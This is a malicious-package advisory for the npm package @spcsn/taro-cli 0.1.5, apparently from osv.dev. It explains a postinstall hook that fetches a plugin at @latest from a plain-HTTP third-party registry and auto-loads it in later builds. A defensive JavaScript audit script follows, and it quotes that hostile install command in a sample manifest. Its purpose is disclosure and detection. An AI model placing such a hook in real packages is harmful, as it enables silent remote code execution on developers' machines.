@spcsn/taro-cli @0.1.5
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-4447
Ecosystem
npm
Summary
The package's postinstall script probes https://taro.jd.com/ and then invokes its own CLI to run npm install @jdtaro/plugin-build-report-performance@latest --registry http://registry.m.jd.com inside the user's global Taro config directory (~/.taro). The plugin is fetched over plain HTTP (no TLS) at the mutable @latest tag from a third-party registry (registry.m.jd.com), not from npmjs.org and not from the package's own publisher infrastructure. After the install, the plugin name is appended to the global plugins list (fs.writeJSONSync(configFilePath, { [configKey]: configItem })), so it is auto-loaded on every subsequent taro invocation.

This is an unpinned, plain-HTTP, third-party code fetch executed at install time and persisted across future builds. An attacker able to MITM HTTP traffic to registry.m.jd.com, or the registry operator itself (since @latest can be republished at any time), can substitute arbitrary code that runs whenever the developer later runs Taro. The behavior is undocumented (the README is empty) and silently enrolls every installer into a JD-operated build-reporting plugin without consent.
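The pattern described above (a lifecycle hook that runs a nested npm install at a mutable tag against a plain-HTTP registry, then persists the result in a global plugin list) can be caught mechanically. The following is an added example written for this report; it is not code from @spcsn/taro-cli, from osv.dev or from Amazon Inspector. The sample package.json is constructed from the command quoted in the summary, and the shape of the Taro config ({ "plugins": [...] }) and the expected-plugin name are assumptions, not Taro's documented format.

```javascript
// Audit of npm lifecycle scripts plus a diff of a persisted plugin list.
// Added example for this report, not code from the package under review.

const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Exact version such as "1.2.3" or "1.2.3-beta.1". Ranges ("^1.2.3") and
// dist-tags ("latest", "next") are mutable and therefore count as unpinned.
const EXACT_SEMVER = /^\d+\.\d+\.\d+(?:-[0-9A-Za-z.-]+)?$/;

// Nested "npm install <spec>" inside a hook: captures the package name
// (scoped or not) and the optional version/tag after the last "@".
const NESTED_INSTALL =
  /\bnpm\s+(?:i|install|add)\s+(@?[^\s@]+)(?:@(\S+))?/;

// "--registry http://..." (space- or "="-separated) selects a plain-HTTP registry.
const HTTP_REGISTRY = /--registry[= ]+(http:\/\/\S+)/;

// Returns a list of findings for the lifecycle hooks in a package.json string.
function auditLifecycleScripts(packageJsonText) {
  const scripts = JSON.parse(packageJsonText).scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;

    const registry = cmd.match(HTTP_REGISTRY);
    if (registry) {
      findings.push({ hook, rule: "plain-http-registry", detail: registry[1] });
    }

    const nested = cmd.match(NESTED_INSTALL);
    if (nested) {
      const [, name, spec] = nested;
      if (spec === undefined || !EXACT_SEMVER.test(spec)) {
        // No spec at all means npm resolves the "latest" dist-tag.
        findings.push({
          hook,
          rule: "unpinned-nested-install",
          detail: `${name}@${spec ?? "latest"}`,
        });
      }
    }

    // A hook that runs a script file hides its behaviour from the manifest;
    // the file itself has to be read, so flag it for review.
    if (/\bnode\s+\S+\.[cm]?js\b/.test(cmd)) {
      findings.push({ hook, rule: "runs-script-file", detail: cmd });
    }
  }
  return findings;
}

// Compare the persisted plugin list against what the developer knowingly
// installed. Assumes (not verified against Taro) a JSON file with a "plugins"
// array of package names.
function unexpectedPlugins(configText, expected) {
  const plugins = JSON.parse(configText).plugins || [];
  const allow = new Set(expected);
  return plugins.filter((name) => !allow.has(name));
}

// Constructed sample mirroring the report: a postinstall hook that installs a
// plugin at @latest from a plain-HTTP third-party registry.
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: "example-cli",
  version: "0.1.5",
  scripts: {
    postinstall:
      "npm install @jdtaro/plugin-build-report-performance@latest --registry http://registry.m.jd.com",
  },
});

// Constructed sample of a global plugin list after such an install. The
// first entry is a hypothetical plugin the developer chose to install.
const SAMPLE_TARO_CONFIG = JSON.stringify({
  plugins: ["@example/plugin-expected", "@jdtaro/plugin-build-report-performance"],
});

function runDemo() {
  return {
    scripts: auditLifecycleScripts(SAMPLE_PACKAGE_JSON),
    plugins: unexpectedPlugins(SAMPLE_TARO_CONFIG, ["@example/plugin-expected"]),
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(runDemo(), null, 2));
}
```

On the sample manifest the audit reports both a plain-http-registry and an unpinned-nested-install finding for the postinstall hook, and the plugin diff returns the JD plugin as the one entry not on the allowlist. The manifest audit is a heuristic: a hook that simply runs node postinstall.js shows none of this, which is why the third rule exists and why the file it names still has to be read. Independently of any scanner, installing with npm's --ignore-scripts flag (or setting ignore-scripts true in .npmrc) stops lifecycle hooks like this one from executing at all.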
Source: amazon-inspector (10e2baba3a5166ecf1196146e1b2a8771836b25bd7f8d56979e3e277a3de9625)